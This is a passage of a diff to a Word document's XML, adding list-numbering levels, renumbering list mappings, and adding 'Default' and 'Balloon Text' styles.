+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="1"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="2">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="3">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="5">
     <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="8">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="9">
+    <w:abstractNumId w:val="7"/>
   </w:num>
 </w:numbering>
 </file>
@@ -3521,6 +8732,48 @@
       </w:tblBorders>
     </w:tblPr>
   </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
+    <w:name w:val="Default"/>
+    <w:rsid w:val="00B52211"/>
+    <w:pPr>
+      <w:widowControl w:val="0"/>
+      <w:autoSpaceDE w:val="0"/>
+      <w:autoSpaceDN w:val="0"/>
+      <w:adjustRightInd w:val="0"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+      <w:color w:val="000000"/>
+      <w:lang w:val="en-US"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="BalloonText">
+    <w:name w:val="Balloon Text"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="BalloonTextChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00C546DD"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
+    <w:name w:val="Balloon Text Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="BalloonText"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00C546DD"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
